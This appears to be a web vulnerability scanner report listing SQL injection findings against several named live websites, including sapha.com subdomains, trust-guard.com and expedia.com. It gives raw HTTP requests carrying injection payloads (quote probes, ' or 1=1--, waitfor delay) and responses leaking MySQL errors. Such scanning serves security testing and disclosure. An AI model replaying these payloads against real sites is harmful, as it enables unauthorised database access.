HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:33:22 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=a9e7a0f4da4672b Content-Size: 6788 Content-Length: 6788 Content-Type: application/x-javascript; charset=UTF-8 var OA_output = new Array(); OA_output['zone_22_1'] = ''; OA_output['zone_22_1'] += "<"+"span><"+"script type=\'text/javascript\'> OA_output['zone_22_1'] += "/* openads=http://ads OA_output['zone_22_1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"> OA_output['zone_22_1'] += "google_ad_client = \"ca-pub-9585000347357330 OA_output['zone_22_1'] += "/* 125x125, created 3/14/10 */\n"; OA_output['zone_22_1'] += "google_ad_slot = \"8399079020\";\n"; OA_output['zone_22_1'] += "google_ad_width = 125;\n"; OA_output['zone_22_1'] += "google_ad_height = 125;\n"; OA_output['zone_22_1'] += "//-->\n"; OA_output['zone_22_1'] += "<"+"/script>\n"; OA_output['zone_22_1'] += "<"+"script type=\"text/javascript\" OA_output['zone_22_1'] += "src=\"http://pagead2 OA_output['zone_22_1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea OA_output['zone_22_2'] = ''; OA_output['zone_22_2'] += "<"+"a href=\'http://ads ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=1'&pid=0&NS_sw=1920&NS_sh Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=1' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=1'' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: sapha_tst_1''=TRUE; expires=Mon, 03-May-2021 22:06:44 GMT; path=/; domain=.sapha.com Vary: Accept-Encoding,User Connection: close Content-Type: application/x-javascript Content-Length: 5603 var SCS_tid=(SCS_tid)?escape ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=/1'2546 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: dce.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQ ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=/1''2546 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: dce.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=1'&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
GET /logging.php?ac=1''&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 302 Found Date: Fri, 06 May 2011 22:05:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | High |
Confidence: | Tentative |
Host: | http://om.expedia.com |
Path: | /b/ss/expedia1/1/G.9p2 |
GET /b%00'/ss/expedia1/1/G.9p2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:04:36 GMT Server: Omniture DC/2.0.0 Content-Length: 393 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%00''/ss/expedia1/1/G.9p2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:04:36 GMT Server: Omniture DC/2.0.0 xserver: www611 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://om.expedia.com |
Path: | /b/ss/expedia1/1/H.9-Pdvu |
GET /b'/ss/expedia1/1/H.9-Pdvu-2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:12:00 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/expedia1/1/H.9 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b''/ss/expedia1/1/H.9-Pdvu-2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:12:00 GMT Server: Omniture DC/2.0.0 xserver: www391 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://poll.websitegear |
Path: | /compactpoll.asp |
GET /compactpoll.asp?pollID Host: poll.websitegear.com Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 19:31:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 98 Content-Type: text/html; Charset=utf-8 Set-Cookie: ASPSESSIONIDSACSQBTS Cache-control: private An error occurred on the server when processing the URL. Please contact the system administrator. |
GET /compactpoll.asp?pollID Host: poll.websitegear.com Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:31:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 0 Content-Type: text/html; Charset=utf-8 Set-Cookie: ASPSESSIONIDSACSQBTS Cache-control: private |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:34 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET /?1,0,0,0)waitfor%20delay'0 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:16:12 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:37:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:31:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:11:07 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d1-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Trust Guard Login</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /><br /> <script type="text/javascript"> function validateForm() { var message; var nouser = (!validatePresent var nopass = (!validatePresent if (nouser && nopass) message = 'Please enter a username and a password.'; else if (nouser) message = 'Please enter a username.'; else if (nopass) message = 'Please enter a password.'; ...[SNIP]... |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d2-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:14 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3795 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Reset Password</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form method="post" style="margin:0px"> Enter you email address or site name below and click Submit and we will send you a new password<br /> <input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent <div id="msg_email"> < <span style="color:Red"> <span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span> <br /> <input id='btnSubmit' name='btnSubmit' type="submit" value="Submit" onclick="return validatePresent(document ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 02:13:09 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:06:53 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php/1'waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:55:15 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://subscribe |
Path: | /scm/ |
GET /scm/?form='waitfor%20delay'0%3a0 Host: subscribe.haymarketmedia Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:49 GMT Content-Length: 5478 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><link href="Pubs/SC ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=-111%27%20OR Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:14:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 412 </td></tr></table><b ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546'&scs_tid=-1+OR+17-7%3d10 HTTP/1.1 Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:08:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQL ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br> ...[SNIP]... |
